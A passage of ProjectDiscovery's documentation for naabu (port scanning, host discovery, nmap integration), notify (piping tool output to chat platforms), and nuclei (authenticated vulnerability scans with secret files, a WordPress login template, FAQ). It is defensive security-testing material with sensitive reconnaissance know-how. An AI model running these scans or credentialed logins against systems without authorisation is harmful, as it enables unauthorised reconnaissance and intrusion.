* ICMP **timestamp** ping (`-pp`)
* ICMP **address mask** ping (`-pm`)
* IPv6 **neighbor discovery** (`-nd`)
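For example, to perform host discovery only on a CIDR range using ICMP echo and TCP SYN probes (the target and probe choices are illustrative):
```sh
naabu -host 192.168.1.0/24 -sn -pe -ps 80
```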
# Configuration file
Naabu supports a default config file located at `$HOME/.config/naabu/config.yaml`. It allows you to define any flag in the config file and set default values to include for all scans.
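A minimal sketch of what such a config file might look like, assuming flag names map directly to YAML keys (the flags and values below are illustrative defaults, not recommendations):
```yaml
# $HOME/.config/naabu/config.yaml
top-ports: "100"
exclude-cdn: true
rate: 500
```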
# Nmap integration
We have integrated nmap support for service discovery or any additional scans supported by nmap on the results found by Naabu; make sure you have `nmap` installed to use this feature.
To use it, the `-nmap-cli` flag can be used followed by the nmap command, for example:
```console
echo hackerone.com | naabu -nmap-cli 'nmap -sV -oX nmap-output'
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.0
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running TCP/ICMP/SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.99.52)
hackerone.com:443
hackerone.com:80
hackerone.com:8443
hackerone.com:8080
[INF] Running nmap command: nmap -sV -p 80,8443,8080,443 104.16.99.52
Starting Nmap 7.01 ( https://nmap.org ) at 2020-09-23 05:02 UTC
Nmap scan report for 104.16.99.52
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
80/tcp open http cloudflare
443/tcp open ssl/https cloudflare
8080/tcp open http-proxy cloudflare
8443/tcp open ssl/https-alt cloudflare
```
# CDN/WAF Exclusion
Naabu also supports excluding CDN/WAF IPs from being port scanned. If used, only ports `80` and `443` get scanned for those IPs. This feature can be enabled by using the `-exclude-cdn` flag.
Currently `cloudflare`, `akamai`, `incapsula` and `sucuri` IPs are supported for exclusions.
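For example, to run a full port scan while limiting CDN/WAF IPs to ports 80 and 443:
```sh
naabu -host hackerone.com -p - -exclude-cdn
```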
# Scan Status
Naabu exposes JSON scan info on a local port bound to localhost at `http://localhost:63636` (the port can be changed via the `-metrics-port` flag).
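While a scan is running, this endpoint can be queried from another terminal; a minimal sketch (the exact response fields may vary by version):
```sh
curl http://localhost:63636
```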
# Using Naabu as a library
The following sample program scans port `80` of `scanme.sh`. The results are returned via the `OnResult` callback:
```go
package main

import (
	"log"

	"github.com/projectdiscovery/goflags"
	"github.com/projectdiscovery/naabu/v2/pkg/result"
	"github.com/projectdiscovery/naabu/v2/pkg/runner"
)

func main() {
	options := runner.Options{
		Host:     goflags.StringSlice{"scanme.sh"},
		ScanType: "s",
		OnResult: func(hr *result.HostResult) {
			log.Println(hr.Host, hr.Ports)
		},
		Ports: "80",
	}
	naabuRunner, err := runner.NewRunner(&options)
	if err != nil {
		log.Fatal(err)
	}
	defer naabuRunner.Close()
	naabuRunner.RunEnumeration()
}
```
# Naabu Usage
Source: https://docs.projectdiscovery.io/tools/naabu/usage
Review Naabu usage including flags, configs, and optimization
## Access Help
Use `naabu -h` to display all help options.
## Naabu Help Options
```yaml
Usage:
./naabu [flags]
INPUT:
-host string[] hosts to scan ports for (comma-separated)
-list, -l string list of hosts to scan ports (file)
-exclude-hosts, -eh string hosts to exclude from the scan (comma-separated)
-exclude-file, -ef string list of hosts to exclude from scan (file)
PORT:
-port, -p string ports to scan (80,443, 100-200)
-top-ports, -tp string top ports to scan (default 100) [full,100,1000]
-exclude-ports, -ep string ports to exclude from scan (comma-separated)
-ports-file, -pf string list of ports to scan (file)
-port-threshold, -pts int port threshold to skip port scan for the host
-exclude-cdn, -ec skip full port scans for CDN/WAF (only scan for port 80,443)
-display-cdn, -cdn display cdn in use
RATE-LIMIT:
-c int general internal worker threads (default 25)
-rate int packets to send per second (default 1000)
UPDATE:
-up, -update update naabu to latest version
-duc, -disable-update-check disable automatic naabu update check
OUTPUT:
-o, -output string file to write output to (optional)
-j, -json write output in JSON lines format
-csv write output in csv format
CONFIGURATION:
-scan-all-ips, -sa scan all the IP's associated with DNS record
-ip-version, -iv string[] ip version to scan of hostname (4,6) - (default 4)
-scan-type, -s string type of port scan (SYN/CONNECT) (default "s")
-source-ip string source ip and port (x.x.x.x:yyy)
-interface-list, -il list available interfaces and public ip
-interface, -i string network Interface to use for port scan
-nmap invoke nmap scan on targets (nmap must be installed) - Deprecated
-nmap-cli string nmap command to run on found results (example: -nmap-cli 'nmap -sV')
-r string list of custom resolver dns resolution (comma separated or from file)
-proxy string socks5 proxy (ip[:port] / fqdn[:port]
-proxy-auth string socks5 proxy authentication (username:password)
-resume resume scan using resume.cfg
-stream stream mode (disables resume, nmap, verify, retries, shuffling, etc)
-passive display passive open ports using shodan internetdb api
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-no-stdin Disable Stdin processing
HOST-DISCOVERY:
-sn, -host-discovery Perform Only Host Discovery
-Pn, -skip-host-discovery Skip Host discovery
-ps, -probe-tcp-syn string[] TCP SYN Ping (host discovery needs to be enabled)
-pa, -probe-tcp-ack string[] TCP ACK Ping (host discovery needs to be enabled)
-pe, -probe-icmp-echo ICMP echo request Ping (host discovery needs to be enabled)
-pp, -probe-icmp-timestamp ICMP timestamp request Ping (host discovery needs to be enabled)
-pm, -probe-icmp-address-mask ICMP address mask request Ping (host discovery needs to be enabled)
-arp, -arp-ping ARP ping (host discovery needs to be enabled)
-nd, -nd-ping IPv6 Neighbor Discovery (host discovery needs to be enabled)
-rev-ptr Reverse PTR lookup for input ips
OPTIMIZATION:
-retries int number of retries for the port scan (default 3)
-timeout int millisecond to wait before timing out (default 1000)
-warm-up-time int time in seconds between scan phases (default 2)
-ping ping probes for verification of host
-verify validate the ports again with TCP verification
DEBUG:
-health-check, -hc run diagnostic check up
-debug display debugging information
-verbose, -v display verbose output
-no-color, -nc disable colors in CLI output
-silent display only results in output
-version display version of naabu
-stats display stats of the running scan (deprecated)
-si, -stats-interval int number of seconds to wait between showing a statistics update (deprecated) (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 63636)
```
# Notes on Usage
* Naabu allows arbitrary binary execution as a feature to support [nmap integration](https://github.com/projectdiscovery/naabu#nmap-integration).
* Naabu is designed to scan ports on multiple hosts / mass port scanning.
* Naabu is configured by default with the assumption that you are running it from a VPS.
* We suggest tuning the flags / rate if running Naabu from a local system.
* For best results, run Naabu as **root** user.
# Notify Install
Source: https://docs.projectdiscovery.io/tools/notify/install
Learn how to install Notify and get started
Enter the command below in a terminal to install Notify using Go.
```bash
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
```
## Installation Notes
* Notify requires the latest version of [**Go**](https://go.dev/doc/install)
# Notify Overview
Source: https://docs.projectdiscovery.io/tools/notify/overview
A Go-based package to streamline and publish output of tools to multiple locations
Notify is a Go-based package designed to streamline the process of monitoring the output from various tools or files. It enables users to pipe this output directly and publish it to a selection of supported platforms.
## Overview
Notify is highly versatile, serving as a crucial link in automating the notification process across different communication platforms, thereby enhancing the efficiency of monitoring and reporting in security operations, development workflows, or any scenario requiring real-time alerts based on tool outputs or file changes.
Check out [the GitHub repo here](https://github.com/projectdiscovery/notify).
## Features
* Support for File / Pipe input
* Support Line by Line / Bulk Post
* Support using Single / Multiple providers
* Support for custom Web-hooks
* Support custom data formatting
### Supported Tools
* Slack
* Discord
* Telegram
* Pushover
* Email
* Microsoft Teams
* Google Chat
## Support
Questions about using Notify? Issues working through installation? Cool story or use case you want to share? Get in touch!
Reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Notify Provider Config
Source: https://docs.projectdiscovery.io/tools/notify/provider-config
Learn how to set up Notify's provider configuration
The default provider config file can be created at `$HOME/.config/notify/provider-config.yaml`.
Each provider (`slack`, `discord`, etc.) is specified at the top level by name, and can then have one to many configurations for that provider, identified by a unique `id` field.
## Slack
**Fields:**
* `slack_channel`: The Slack channel to post to
* `slack_username`: The name of the bot to post as
* `slack_format`: By default just `{{data}}`, but you can specify more formatting details
* `slack_webhook_url`: The URL for the Slack integration webhook (See [Slack help for more information](https://slack.com/help/articles/115005265063-Incoming-webhooks-for-Slack))
**Example:**
```yaml
slack:
  - id: "slack"
    slack_channel: "recon"
    slack_username: "test"
    slack_format: "{{data}}"
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
  - id: "vulns"
    slack_channel: "vulns"
    slack_username: "test"
    slack_format: "{{data}}"
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
```
## Discord
```yaml
discord:
  - id: "crawl"
    discord_channel: "crawl"
    discord_username: "test"
    discord_format: "{{data}}"
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
  - id: "subs"
    discord_channel: "subs"
    discord_username: "test"
    discord_format: "{{data}}"
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
```
## Telegram
```yaml
telegram:
  - id: "tel"
    telegram_api_key: "XXXXXXXXXXXX"
    telegram_chat_id: "XXXXXXXX"
    telegram_format: "{{data}}"
    telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)
```
## Pushover
```yaml
pushover:
  - id: "push"
    pushover_user_key: "XXXX"
    pushover_api_token: "YYYY"
    pushover_format: "{{data}}"
    pushover_devices:
      - "iphone"
```
## Email (SMTP)
```yaml
smtp:
  - id: email
    smtp_server: mail.example.com
    smtp_username: test@example.com
    smtp_password: password
    from_address: from@email.com
    smtp_cc:
      - to@email.com
    smtp_format: "{{data}}"
    subject: "Email subject"
    smtp_html: false
    smtp_disable_starttls: false
```
## Google Chat
```yaml
googlechat:
  - id: "gc"
    key: "XXXXXXXX"
    token: "XXXXXX"
    space: "XXXXXX"
    google_chat_format: "{{data}}"
```
## Microsoft Teams
```yaml
teams:
  - id: "recon"
    teams_webhook_url: "https://.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
    teams_format: "{{data}}"
```
## Gotify
```yaml
gotify:
  - id: 'gotify'
    gotify_host: 'XXXXXX'
    gotify_port: '80'
    gotify_token: 'XXXXXX'
    gotify_format: '{{data}}'
    gotify_disabletls: false
    gotify_title: "recon"
```
## Custom Webhook
```yaml
custom:
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{{data}}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX

custom:
  - id: webhookJson
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{"text":{{dataJsonString}} }'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX

custom:
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_sprig: '{"text":"{{ .url }}"}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
```
# Running Notify
Source: https://docs.projectdiscovery.io/tools/notify/running
Learn about running Notify with details on variables and examples
For all of the flags and options available for **Notify** be sure to check out the [Usage](/tools/notify/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
Notify supports piping the output of any tool or output file and sending it to the configured provider(s) (e.g., a Discord or Slack channel) as a notification.
### Send notification using piped(stdin) output
```sh
subfinder -d hackerone.com | notify -bulk
```
![image](https://user-images.githubusercontent.com/8293321/130240854-e3031bc6-ecc8-47f8-9654-4c58e09cc622.png)
### Send notification using output file
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt
```
### Send notification using output file in bulk mode
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk
```
### Send notification using output file to specific providers
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -provider discord,slack
```
### Send notification using output file to specific IDs
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -id recon,vulns,scan
```
## Example Uses
The following command will enumerate subdomains using [SubFinder](https://github.com/projectdiscovery/subfinder), probe alive URLs using [httpx](https://github.com/projectdiscovery/httpx), run [Nuclei](https://github.com/projectdiscovery/nuclei) templates, and send the Nuclei results as notifications to the configured provider(s).
```sh
subfinder -d intigriti.com | httpx | nuclei -tags exposure -o output.txt; notify -bulk -data output.txt
```
## Provider Config
The tool tries to use the default provider config (`$HOME/.config/notify/provider-config.yaml`); a custom one can also be specified via the CLI by using the **provider-config** flag.
To run the tool with custom provider config, just use the following command.
```sh
notify -provider-config providers.yaml
```
## Notify Config
Notify flags can be configured in the default config (`$HOME/.config/notify/config.yaml`), or a custom config can be provided using the `config` flag.
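A minimal sketch of what such a config file might look like, assuming flag names map directly to YAML keys (the flags and values below are illustrative):
```yaml
# $HOME/.config/notify/config.yaml
bulk: true
delay: 2
provider:
  - slack
  - discord
```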
## Notes
* By default, Notify sends notifications line by line
* Use `-bulk` to send the notification as entire message(s) (messages might be chunked)
## References
* [Creating Slack webhook](https://slack.com/intl/en-it/help/articles/115005265063-Incoming-webhooks-for-Slack)
* [Creating Discord webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks)
* [Creating Telegram bot](https://core.telegram.org/bots#3-how-do-i-create-a-bot)
* [Creating Pushover Token](https://github.com/containrrr/shoutrrr/blob/main/docs/services/pushover.md)
Notify is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Notify Usage
Source: https://docs.projectdiscovery.io/tools/notify/usage
Learn Notify usage including flags and filters
## Access help
Use `notify -h` to display all of the help options.
## Notify options
| Flag | Description | Example |
| ----------------------- | -------------------------------------------------- | ------------------------------------- |
| `-bulk` | enable bulk processing | `notify -bulk` |
| `-char-limit` | max character limit per message (default 4000) | `notify -cl 2000` |
| `-config` | notify configuration file | `notify -config config.yaml` |
| `-data` | input file to send for notify | `notify -i test.txt` |
| `-delay` | delay in seconds between each notification | `notify -d 2` |
| `-id` | id to send the notification to (optional) | `notify -id recon,scans` |
| `-msg-format` | add custom formatting to message | `notify -mf Hey {{data}}` |
| `-no-color` | disable colors in output | `notify -nc` |
| `-provider-config` | provider config path | `notify -pc provider.yaml` |
| `-provider` | provider to send the notification to (optional) | `notify -p slack,telegram` |
| `-proxy` | http proxy to use with notify | `notify -proxy http://127.0.0.1:8080` |
| `-rate-limit` | maximum number of HTTP requests to send per second | `notify -rl 1` |
| `-silent` | enable silent mode | `notify -silent` |
| `-verbose` | enable verbose mode | `notify -verbose` |
| `-version` | display version | `notify -version` |
| `-update` | updates to latest version | `notify -update` |
| `-disable-update-check` | disables automatic update check | `notify -duc` |
# Authenticated Scans
Source: https://docs.projectdiscovery.io/tools/nuclei/authenticated-scans
Learn about scanning targets behind authentication with Nuclei
## What is an **Authenticated Scan** ?
There are some scenarios when running a Nuclei scan on a target might not be enough to find vulnerabilities. If a target is protected by login, then the scan will not be able to access those protected endpoints. This means vulnerabilities that are only accessible after logging in will not be found.
This is why authenticating with targets is important. Before **Nuclei v3.2.0**, you could only authenticate by passing a header with the `-H` flag, but this limits the scope of authentication and is not a scalable solution, since authentication would need to be performed manually and the headers would need to be updated manually.
To solve this issue, Nuclei v3.2.0 introduces a **new specification for generic client-side authentication** that allows apps like Nuclei to authenticate with targets. We call this format the `Secret File`, and it is managed through a YAML file that contains authentication-related configuration.
This functionality is under development for other ProjectDiscovery Tools.
## Specification
Since authentication can be done in multiple ways, for example, using 3rd-party services like OAuth, custom login, SSO, Bearer Auth and more - this specification categorizes authentication into two types: static authentication and dynamic authentication.
### Static Authentication
This approach involves a single, static secret that doesn't change frequently and serves as a direct indicator of an authenticated HTTP session. Examples include API Keys or credentials used in Basic Authentication (username and password).
### Dynamic Authentication
This method requires multiple, frequently changing secrets to manage a session. It's typical of processes like a social login or OAuth. In dynamic authentication, one set of credentials (for example: username and password) is used for the initial authentication, while additional elements (such as a session cookie or header) are employed to maintain the session's state.
### Dealing with Dynamic Authentication
Implementing and managing Static Authentication is easy, but dealing with Dynamic Authentication is more complex because multiple entities, secrets, and the authentication flow itself are involved. Some setups might require browser-guided authentication, while others can be achieved with a scripted auth flow.
A common solution for this is to capture and generate a login flow/sequence using a browser and then feed that script to the app handling the authentication.
To make this process easy, familiar, and scalable (users should be able to scan thousands of targets with authentication without much hassle), we leverage the existing rich ecosystem of `nuclei-templates`. These are written in YAML, are scalable, and come with a powerful engine.
We achieve this scalability by reusing and extending our `default-login` templates library. We are continuously adding templates for different apps and services, and these templates can then be referenced in the `Secret File` to perform authentication.
### Scope of Authentication
It is recommended to send authentication-related data to only those targets that use and require them, instead of sharing them globally and risk leaking secrets to third parties.
To limit the scope of a particular secret, we have introduced two fields, `domains` & `domains-regex` (mutually exclusive), which can be used to limit the scope of a secret to a particular set of targets.
Use a wildcard like `.*` to send a secret to all targets. Only one secret can be used for a particular target; if multiple secrets are found for a target, the first one will be used, with priority given to `domains` over `domains-regex`.
### Security & Storing Secret
We have not imposed the need to hardcode secrets in the `Secret File` configuration, and support the use of third-party secret management systems to templatize and manage secrets.
### Integrations with Secret Management Systems
We are currently exploring integrations with popular secret management systems for easy and secure management of secrets.
We are prioritizing support for:
* **1Password**
* **Hashicorp Vault**
* **AWS Secrets Manager**
### Skipping Secret File
This feature is available in Nuclei **v3.3.1**.
If you provide a secret file to the Nuclei engine, it will automatically configure authentication or authorization for each request in the executed templates. In case you want to skip the secret configuration from the secret file and instead use hardcoded secrets or variables in specific templates, you can use the `skip-secret-file` *(bool)* option. By setting this property to **true**, Nuclei will not apply the secrets to each request in those templates.
**Example**
```yaml
variables:
  username: foo
  password: bar

http:
  - raw:
      - |
        GET /some-restricted-page HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Authorization: Basic {{base64(concat(username, ":", password))}}
    skip-secret-file: true
```
## Secret File Formats
YAML format of Secret File as of **Nuclei v3.2.0**:
```yaml
# static secrets
static:
  # 1. Basic Auth based auth
  - type: basicauth
    domains:
      - scanme.sh
    username: test
    password: test

  # 2. API Key (via query parameters) based auth
  - type: query
    domains:
      - example.com
    params:
      - key: token
        value: 1a2b3c4d5e6f7g8h9i0j

  # 3. Bearer Token based auth
  - type: bearertoken
    domains-regex:
      - .*scanme.sh
      - .*pdtm.sh
    token: test

  # 4. Custom Header based auth
  - type: header
    domains:
      - api.projectdiscovery.io
      - cve.projectdiscovery.io
      - chaos.projectdiscovery.io
    headers:
      - key: x-pdcp-key
        value:

  # 5. Cookie based auth
  - type: cookie
    domains:
      - scanme.sh
    cookies:
      - key: PHPSESSID
        value: 1a2b3c4d5e6f7g8h9i0j
        # raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)

# dynamic secrets
dynamic:
  # An example dynamic login of WordPress using REST API
  - template: /path/to/wordpress-login.yaml
    variables:
      - key: username
        value: pdteam
      - key: password
        value: nuclei-fuzz
    input: auth-server.projectdiscovery.io # optional input/target, not required if target is hardcoded in template

    # once login is successful, this can be used in below templatized static secret
    type: cookie
    domains:
      - .*wp.*projectdiscovery.io
    cookies:
      - raw: "{{wp-global-cookie}}"
      - raw: "{{wp-admin-cookie}}"
      - raw: "{{wp-plugin-cookie}}"
    # Note: This here (^) is a static secret in a templatized form
    # so it can be any of the static secret type and not limited to just `cookie`.
```
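Once a secret file is prepared, it can be passed to a scan. A minimal sketch, assuming your Nuclei version (v3.2.0 or later) exposes the secret file via the `-secret-file` flag; the target and file path are illustrative:
```bash
nuclei -u https://scanme.sh -secret-file /path/to/secret-file.yaml
```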
## Secret File Fields
Here's a brief explanation of each field in the secret file:
### `type`
This field specifies the type of static secret being used and determines where the secret should be updated in the request. The following types are supported:
* `basicauth`: Basic Authentication
* `query`: Query Parameters
* `bearertoken`: Bearer Token
* `header`: Custom Header
* `cookie`: Cookie
### `domains`
This field is used to specify the domains for which the secret should be used. If the target domain matches any of the domains specified here, the secret will be used for that target. This field is mutually exclusive with `domains-regex` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains:
  - scanme.sh
  - example.com
```
### `domains-regex`
This field is used to specify the domains for which the secret should be used using regex. If the target domain matches any of the regex specified here, the secret will be used for that target. This field is mutually exclusive with `domains` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains-regex:
  - .*projectdiscovery.io
  - .*pdtm.sh
```
### `username` & `password`
These fields are used to specify the username and password for Basic Authentication and can only be used with `type: basicauth`.
Example:
```yaml
type: basicauth
domains:
  - scanme.sh
username: test
password: test
```
### `params`
Params is a list of key-value pairs that are used to specify the query parameters for the request. This field can only be used with `type: query`.
Example:
```yaml
type: query
domains:
  - example.com
params:
  - key: token
    value: 1a2b3c4d5e6f7g8h9i0j
```
### `token`
This field is used to specify the Bearer Token for the request and can only be used with `type: bearertoken`.
Example:
```yaml
type: bearertoken
domains-regex:
  - .*scanme.sh
  - .*pdtm.sh
token: 6f7g8h9i0j1a2b3c4d5e
```
### `headers`
Headers is a list of key-value pairs that are used to specify the custom headers for the request. This field can only be used with `type: header`.
Example:
```yaml
type: header
domains:
  - api.projectdiscovery.io
  - cve.projectdiscovery.io
  - chaos.projectdiscovery.io
headers:
  - key: x-pdcp-key
    value:
```
### `cookies`
Cookies is a list of key-value pairs that are used to specify the cookies for the request. This field can only be used with `type: cookie`.
Example:
```yaml
type: cookie
domains:
  - scanme.sh
cookies:
  - key: PHPSESSID
    value: 1a2b3c4d5e6f7g8h9i0j
    # raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)
```
### `template`
`template` contains the absolute or relative path (relative to the nuclei-templates directory) of the template file that will be used to authenticate with the target. This field can only be used with `type: dynamic`.
A template used for dynamic authentication should accept `variables` and optionally `input` as input, and should return the session data via an extractor. The session data can then be used in the static secret.
Example:
In this example, a username and password are used to log in to a WordPress instance using the REST API, and the session data is exported via extractors.
```yaml
id: wordpress-login

info:
  name: WordPress Login
  author: pdteam
  severity: info
  description: |
    WordPress Login template to use in workflows for authenticated wordpress testing.
  tags: wordpress,login

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

    extractors:
      - type: regex
        name: wp-plugin-cookie
        part: header
        internal: true
        regex:
          - "Set-Cookie: .+?; path=/wp-content/plugins; HttpOnly"
      - type: regex
        name: wp-admin-cookie
        part: header
        internal: true
        regex:
          - "Set-Cookie: .+?; path=/wp-admin; HttpOnly"
      - type: regex
        name: wp-global-cookie
        part: header
        internal: true
        regex:
          - "Set-Cookie: .+?; path=/; HttpOnly"
```
### `variables`
`variables` is a list of key-value pairs that are used to specify the variables for the template. This field can only be used with `type: dynamic` and is only required if the template requires variables.
Example:
```yaml
variables:
  - key: username
    value: pdteam
  - key: password
    value: nuclei-fuzz
```
### `input`
`input` is an optional input/target for the template to be executed on and is only required if the target is not hardcoded in the template. Specifying `input` here allows easy switching between dev and prod environments compared to hardcoding the target in the template.
Example:
```yaml
input: auth-server.projectdiscovery.io
```
# Nuclei FAQ
Source: https://docs.projectdiscovery.io/tools/nuclei/faq
Common questions and answers about Nuclei
If you have other issues to report we'd love to share those with the community. Please join our [Discord server](https://discord.gg/projectdiscovery), or reach out to us on [GitHub](https://github.com/projectdiscovery).
## General
Questions and answers on general topics for Nuclei.
Nuclei is a powerful open-source vulnerability scanner that is fast and customizable. It uses simple templates (YAML-based) that describe how to detect, prioritize, and remediate security vulnerabilities for the Nuclei scanning engine.
Of the two components, the [Nuclei engine](http://github.com/projectdiscovery/nuclei) is the core of the project. It allows scripting HTTP / DNS / Network / Headless / File protocol-based checks in a YAML-based format that is very simple to read and write.
The Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) - are custom-created or ready-to-use **community-contributed** vulnerability templates.
Nuclei was created to solve many of the limitations of traditional scanners, which always lacked the features to allow easy-to-write custom checks on top of their engine.
Nuclei was built with a focus on simplicity, modularity, and the ability to scale scanning for many assets.
Ultimately, we wanted to create something simple enough to be used by everyone with the complexity to integrate well with the intricacies of the modern technical stack.
Nuclei's features are implemented and tailored to allow rapid prototyping for complex security checks.
Nuclei is actively maintained and supported by ProjectDiscovery. In general, we release every two weeks and continue to refine, update, and expand Nuclei and its associated capabilities.
Our team also actively monitors for announcements about new CVEs, exploits, and other vulnerabilities to quickly provide a response to address those issues.
We recently released Nuclei v3, [read more about that release on our blog.](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/)
Nuclei is open-source! The best way to support Nuclei is to contribute new templates.
In addition, we are always interested in hearing about how our community uses Nuclei to solve unique security problems and would love to discuss more.
If you want to share the process of a solution you found in walk-through on our blog, we are happy to publish your guest post on the [ProjectDiscovery blog](https://blog.projectdiscovery.io).
Review more details about the project [through GitHub](https://github.com/projectdiscovery/nuclei-templates) or [reach out to us on Discord.](https://discord.com/servers/projectdiscovery-community-695645237418131507)
## Usage
Question and answers about using Nuclei.
Nuclei can be installed with several different options including: Go, Brew, and Docker. Check out [the Nuclei install page](/tools/nuclei/install) for details on all of the options.
Nuclei supports the following type of modules.
* [HTTP](/templates/protocols/http/)
* [DNS](/templates/protocols/dns/)
* [TCP](/templates/protocols/network/)
* [HEADLESS](/templates/protocols/headless/)
* [JAVASCRIPT](/templates/protocols/javascript/)
* [CODE](/templates/protocols/code/)
* [FILE](/templates/protocols/file/)
Nuclei can detect security vulnerabilities in **Web Applications**, **Networks**, **DNS** based misconfiguration, and **Secrets scanning** in source code or in files on the local file system.
In addition, you can now connect your Nuclei setup to ProjectDiscovery Cloud Platform (PDCP) to view your scans. [Check out more information](/cloud/introduction) on PDCP Free and our upcoming Teams release.
To learn more about Nuclei templates, check out [the GitHub repository](https://github.com/projectdiscovery/nuclei-templates), and [explore additional documentation here](templates/introduction).
After detecting a security issue **we always recommend that you validate it a second time** before reporting it.
**To validate:**
If you have both a vulnerable target and template, rerun the template with the `-debug` flag to inspect the output against the expected matcher defined in the template. Use this to confirm the identified vulnerability.
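For example (the target and template path are illustrative):
```bash
nuclei -u https://vulnerable.example.com -t path/to/template.yaml -debug
```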
Once you confirm the result, report it!
By default, Nuclei will make several thousand requests (both HTTP protocol and other services) against a single target when running **all nuclei-templates**.
This is the result of running over 3500 templates (*with an active and growing template library*).
By default, [the following templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) are excluded from default scans.
We consider two factors for “safety” within the context of Nuclei.
* The traffic Nuclei creates against the target
* The impact templates have on the target
**Traffic**
Nuclei usually makes fewer HTTP requests than the number of templates selected for a scan due to its intelligent request reduction.
While some templates contain multiple requests, this rule holds true across most scan configurations.
**Templates**
The library of Nuclei templates houses a variety of templates which perform fuzzing and other actions which may result in a DoS against the target system ([see the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)).
To ensure these templates are not run accidentally, they are tagged and excluded from the default scan. These templates can only be executed when explicitly invoked using the `-itags` option.
Nuclei is an open-source project distributed under the [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md).
Please join our [Discord server](https://discord.gg/projectdiscovery), or contact us via [Twitter](http://twitter.com/pdnuclei).
## Troubleshooting
Questions and answers about troubleshooting scenarios for Nuclei.
Nuclei uses templates to scan for potential vulnerabilities. These templates are files that contain information on identifying certain types of vulnerabilities.
Think of the templates as a building blueprint. On its own a blueprint cannot cause harm, as it only describes how a building or construct (in this example, a vulnerability) can be built or identified.
**For example:**
* `Webshell.Generic.118` is a template to check for the vulnerability CVE-2017-12615, which is a specific vulnerability in some versions of Apache Tomcat.
* `Backdoor.Generic.LinuxTsunami` is a template that can identify the infamous Linux Tsunami backdoor if it were present on a system.
* `kingdee-erp-rce.yaml` is a template designed to identify a remote code execution vulnerability in Kingdee ERP software.
These files are being flagged as **malware** by anti-malware solutions because they contain patterns that match known vulnerabilities.
It's similar to a textbook on viruses being detected as an actual virus.
Remember, these templates can't "harm" your computer, they are not executing any malicious code on your system.
However, if used as part of a vulnerability scanning process against an insecure system, they could help identify weaknesses.
Headless mode on Linux-based machines (OS or containers, e.g. Docker) might face runtime errors due to missing dependencies related to specific OS shared libraries used by the Chrome binary.
Usually, these errors can be fixed by pre-installing the browser on the specific distribution. Here is a list of the steps needed for the most common distributions.
Ubuntu
With snap:
```sh
sudo snap install chromium
```
Without snap:
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
In case you are unable to install the browser, or want to install only the minimum required dependencies, run the following command:
```
sudo apt-get install libnss3 libgconf-2-4
```
If you encounter an error similar to "libnss3.so: cannot open shared object file: No such file or directory," try running the following command to install the dev version:
```
sudo apt-get install libnss3-dev
```
Error type examples:
```
Error: Expected nil, but got: &errors.errorString{s:"[launcher] Failed to launch the browser, the doc might help https://go-rod.github.io/#/compatibility?id=os: /root/.cache/rod/browser/chromium-1018003/chrome-linux/chrome: error while loading shared libraries: libnss3.so: cannot open shared object file: No such file or directory\n"}
```
```
could not create browser
```
```
Command '/usr/bin/chromium-browser' requires the chromium snap to be installed.
Please install it with:
snap install chromium
```
## Other FAQs
Check out the [Nuclei Template FAQ](/templates/faq) for more questions and answers about templates.
# Supported Input Formats
Source: https://docs.projectdiscovery.io/tools/nuclei/input-formats
Learn about supported input formats in Nuclei and how to use them
Input Formats supported by Nuclei can be grouped into two categories:
* **List Type**: Input formats that can be specified as a list of items (ex: URLs, IPs, CIDRs, ASN, etc.)
